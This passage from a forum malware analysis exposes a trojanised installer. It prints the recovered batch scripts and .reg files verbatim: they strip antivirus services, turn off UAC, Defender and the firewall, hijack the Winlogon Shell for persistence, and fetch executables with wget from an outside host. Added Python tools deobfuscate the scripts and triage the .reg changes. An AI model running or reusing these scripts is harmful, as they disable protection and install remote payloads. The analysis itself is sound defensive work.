Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MsMpSvc" /f
Reg Add "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /v "Start" /t REG_DWORD /d "4" /f
bcdedit /deletevalue "{current}" safeboot
reg add "HKLM\SYSTEM\CurrentControlset\Control\Nls\Language" /v "Default" /t REG_SZ /d "0409" /f
regedit /s %windir%\usw.reg
regedit /s %windir%\d.reg
set /a tz=(%random%%%4)+1
if %tz% == 1 regedit /s %windir%\at.reg
if %tz% == 2 regedit /s %windir%\ct.reg
if %tz% == 3 regedit /s %windir%\et.reg
if %tz% == 4 regedit /s %windir%\mt.reg
del %windir%\Set-up.exe
del %windir%\at.reg
del %windir%\ct.reg
del %windir%\et.reg
del %windir%\mt.reg
del %windir%\c.exe
del %windir%\usw.reg
del %windir%\d.reg
del %windir%\b.bat
shutdown /r /f /t 10
del %0
::
::
Code:
@echo off
set "url=http://db.softfire.info/rs/st"
::
::
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (set "bits=32") else set "bits=64"
regedit /s %windir%\mgr_f.reg
timeout /t 30
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe"
if exist "%windir%\fr.exe" (
goto start_fr
) else (
timeout /t 120
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe"
if not exist "%windir%\fr.exe" exit
goto start_fr
)
:e
timeout /t 60
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat"
if exist "%windir%\e.bat" (
start %windir%\e.exe
) else (
timeout /t 120
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat"
if not exist "%windir%\e.bat" exit
start %windir%\e.exe
)
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
if %ERRORLEVEL% EQU 0 (
regedit /s %windir%\e.reg
del %windir%\e.reg
del %windir%\fr.exe
del %windir%\d.exe
del %windir%\s.txt
del %0
) else (
regedit /s %windir%\mgr_n.reg
exit
)
:start_fr
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
if %ERRORLEVEL% EQU 1 start %windir%\fr.exe
goto e
::
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"ConsentPromptBehaviorAdmin"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000
"ConsentPromptBehaviorUser"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend]
"Start"=dword:00000005

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MpsSvc]
"Start"=dword:00000004
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:000000f0
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-82"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-82"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Atlantic Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000001
"ActiveTimeBias"=dword:000000f0
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:00000168
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-151"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-152"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Central America Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000000
"ActiveTimeBias"=dword:00000168
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:0000012c
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-112"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-112"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Eastern Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000001
"ActiveTimeBias"=dword:0000012c
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:000001a4
"DaylightBias"=dword:00000000
"DaylightName"="@tzres.dll,-192"
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"StandardBias"=dword:00000000
"StandardName"="@tzres.dll,-192"
"StandardStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Mountain Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000001
"ActiveTimeBias"=dword:000001a4
Code:
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
Code:
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000000
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,c.exe"
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,d.exe"
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,e.exe"
A look at the innards of the exe files. Running these files was not tested, and no dissection was done either, for lack of the necessary resources and tools. Screenshots are in the spoiler.
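The a.bat and b.bat listings above hide every command behind a dictionary of one- and two-letter variables (`s%j%%a3%` is `set`, `%zx3%` is a double quote, `%l%` is the download URL assembled from fragments). The hand-decoded versions in the post were produced by resolving those variables. The following is an added example, not code from the post, that automates the same resolution: it replays the script's `set` lines statically, expands `%name%` references, keeps `%%` and unknown names (`%windir%`, `%errorlevel%`, values read from s.txt) symbolic, and runs a second pass so that variables the script also assigns at run time (such as `osver`) stay symbolic instead of being frozen at their first value. The input is a constructed sample that mimics the post's scheme with the placeholder domain `lab.example`; the same function can be pointed at the text of the real a.bat.

```python
import re

# `set name=value` / `set "name=value"` at the start of a line (set /a and set /p skipped)
ASSIGN_AT_START = re.compile(r'^\s*set\s+(?!/)(?P<rest>.+)$', re.IGNORECASE)
# an assignment anywhere else in a line (e.g. behind `if ...`): runtime state, not alphabet
ASSIGN_ANYWHERE = re.compile(r'\bset\s+"?([A-Za-z_]\w*)=', re.IGNORECASE)


def expand_line(line, env):
    """Expand %name% references from env (case-insensitive). '%%' is copied
    through so the output stays valid batch source, and names that are not in
    env (%windir%, %errorlevel%, values read from s.txt) are left symbolic."""
    out, i, n = [], 0, len(line)
    while i < n:
        if line[i] != '%':
            out.append(line[i]); i += 1; continue
        if i + 1 < n and line[i + 1] == '%':
            out.append('%%'); i += 2; continue
        j = line.find('%', i + 1)
        if j == -1:                       # lone % (e.g. %0): nothing to expand
            out.append(line[i:]); break
        name = line[i + 1:j].lower()
        out.append(env.get(name, line[i:j + 1]))
        i = j + 1
    return ''.join(out)


def parse_assignment(rest):
    """(name, value) for the text after `set `. cmd takes everything between the
    first and the last quote, so `set "q=""` assigns one double-quote character,
    which is how the script hides the quotes around its wget arguments."""
    rest = rest.strip()
    if rest.startswith('"'):
        rest = rest[1:rest.rfind('"')]
    name, sep, value = rest.partition('=')
    if not sep or not name.strip():
        return None
    return name.strip().lower(), value


def _run(lines, skip):
    env, out, conditional = {}, [], set()
    for raw in lines:
        line = expand_line(raw, env)
        out.append(line)
        m = ASSIGN_AT_START.match(line)
        if m:
            parsed = parse_assignment(m.group('rest'))
            if parsed and parsed[0] not in skip:
                env[parsed[0]] = parsed[1]
            continue
        conditional.update(x.lower() for x in ASSIGN_ANYWHERE.findall(line))
    return out, env, conditional


def deobfuscate(text):
    """Two passes: the first learns the substitution alphabet and spots variables
    that are also assigned conditionally (runtime state such as osver); the
    second leaves those symbolic, which is what a hand-decoded listing shows."""
    lines = text.splitlines()
    _, _, conditional = _run(lines, skip=set())
    out, env, _ = _run(lines, skip=conditional)
    return '\n'.join(out), env


# Constructed sample in the style of the post's a.bat (placeholder domain lab.example).
SAMPLE = r'''@echo off
set "a3=t"
set "j=e"
set "xj66=s"
s%j%%a3% "zx3=""
s%j%%a3% "n3=i"
s%j%%a3% "a1=h"
s%j%%a3% "a2=p"
s%j%%a3% "a4=/"
s%j%%a3% "a5=."
s%j%%a3% "a6=:"
s%j%%a3% "kl=-"
s%j%%a3% "g1=%windir%"
s%j%%a3% "s5=%xj66%%a3%ar%a3%"
s%j%%a3% "l=%a1%%a3%%a3%%a2%%a6%%a4%%a4%lab%a5%%j%xampl%j%%a4%r%xj66%"
::
%s5% %g1%\S%j%%a3%-up%a5%%j%x%j%
s%j%%a3% osver=Unknown
v%j%r | findstr /IL "5.1." > nul
%n3%F %errorlevel% EQU 0 s%j%%a3% "osver=Windows_XP"
%n3%f %osver% == Windows_XP goto n
wg%j%%a3%%a5%%j%x%j% %kl%c %kl%P %zx3%%g1%%zx3% %zx3%%l%%a4%b%a5%bat%zx3%
:n
d%j%l %0'''

if __name__ == '__main__':
    decoded, alphabet = deobfuscate(SAMPLE)
    print(decoded)
    print('alphabet:', alphabet)
```

The decoded listing reads `start %windir%\Set-up.exe` followed by `wget.exe -c -P "%windir%" "http://lab.example/rs/b.bat"`, and the returned alphabet is the lookup table an analyst would otherwise build by hand (`zx3` resolves to `"`, `l` to the download base URL). Static replay is deliberate: nothing is executed, and anything the script would only learn at run time stays visible as a `%name%` placeholder.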
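Step 4 and the .reg listings above show the persistence and defence-evasion settings the downloaded files push: UAC switched off in Policies\System, WinDefend/MpsSvc/SharedAccess services disabled, Task Manager blocked, the time zone rewritten, and `explorer.exe,c.exe` placed in the Winlogon Shell value so the dropped program starts with the desktop. The following is an added example, not code from the post, that parses .reg text of this form and flags those settings, so that recovered .reg files from a sample can be triaged offline before anything is imported; the sample input is the post's own .reg contents merged into one constructed file (real exports are UTF-16LE with a BOM and must be decoded to text first, which this code assumes has been done).

```python
import re

SECTION_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
VALUE_RE = re.compile(r'^"(?P<name>[^"]*)"=(?P<data>.*)$')
DWORD_RE = re.compile(r'^dword:(?P<hex>[0-9a-fA-F]{8})$')
STRING_RE = re.compile(r'^"(?P<s>.*)"$')
SERVICE_RE = re.compile(r'^hkey_local_machine\\system\\currentcontrolset\\services\\([^\\]+)$')

# services the post's scripts switch off; Start=4 is "disabled", 5 is not even a valid value
SECURITY_SERVICES = {'windefend', 'mpssvc', 'sharedaccess', 'ekrn'}


def parse_reg(text):
    """(key, name, value) triples: dword -> int, "string" -> str, other data (hex:) -> raw text.
    Default values (@=...) are not needed for this triage and are skipped."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';') or line.startswith('Windows Registry Editor'):
            continue
        m = SECTION_RE.match(line)
        if m:
            key = m.group('key'); continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        data = m.group('data')
        d, s = DWORD_RE.match(data), STRING_RE.match(data)
        value = int(d.group('hex'), 16) if d else (s.group('s') if s else data)
        entries.append((key, m.group('name'), value))
    return entries


def triage(entries):
    """Return (severity, message) findings for the tampering seen in the post."""
    findings = []
    for key, name, value in entries:
        k, n = key.lower(), name.lower()
        svc = SERVICE_RE.match(k)
        if k.endswith(r'\windows nt\currentversion\winlogon') and n == 'shell':
            if not (isinstance(value, str) and value.strip().lower() == 'explorer.exe'):
                findings.append(('high', f'Winlogon Shell changed to {value!r} (extra program starts with the desktop)'))
        elif k.endswith(r'\policies\system'):
            if n == 'enablelua' and value == 0:
                findings.append(('high', 'UAC disabled (EnableLUA=0)'))
            elif n in ('consentpromptbehavioradmin', 'promptonsecuredesktop') and value == 0:
                findings.append(('medium', f'UAC prompt weakened ({name}=0)'))
            elif n == 'disabletaskmgr' and value == 1:
                findings.append(('medium', 'Task Manager disabled (DisableTaskMgr=1)'))
        elif svc and n == 'start' and svc.group(1) in SECURITY_SERVICES:
            if isinstance(value, int) and value >= 4:
                findings.append(('high', f'service {key.rsplit(chr(92), 1)[-1]} Start={value} (4 = disabled)'))
        elif k.endswith(r'\control\timezoneinformation') and n == 'timezonekeyname':
            findings.append(('low', f'time zone rewritten to {value!r}'))
    return findings


# Constructed sample: the settings from the post's .reg files, merged into one file.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"ConsentPromptBehaviorAdmin"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000
"ConsentPromptBehaviorUser"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend]
"Start"=dword:00000005

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MpsSvc]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation]
"Bias"=dword:0000012c
"DaylightStart"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"TimeZoneKeyName"="Eastern Standard Time"
"DynamicDaylightTimeDisabled"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,c.exe"
'''

if __name__ == '__main__':
    for severity, message in triage(parse_reg(SAMPLE_REG)):
        print(f'[{severity}] {message}')
```

On the sample this reports five high findings (UAC off, three security services disabled, Winlogon Shell hijack), three medium (two weakened UAC prompts, Task Manager blocked) and one low (time zone change); the benign `DisableTaskMgr=0` file from the post produces no finding. The Shell check is written as "anything other than exactly explorer.exe" rather than a list of bad names, since the post shows three variants (c.exe, d.exe, e.exe) of the same trick.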
Eastoop (Deputy Program Curator) wrote:
As far as I understood with my meagre mind, the purpose of all this junk is not harvesting logins and passwords but stealing licence keys, possibly for later resale.
anatm (Uploader 100+) wrote:
Eastoop wrote:
"As far as I understood with my meagre mind"

Modest one :respect:
AleksKochemir (Uploader 100+) wrote:
Thanks to everyone who took all the necessary steps to expose the malicious activity!!! Very informative. Do keep sharing reviews like this.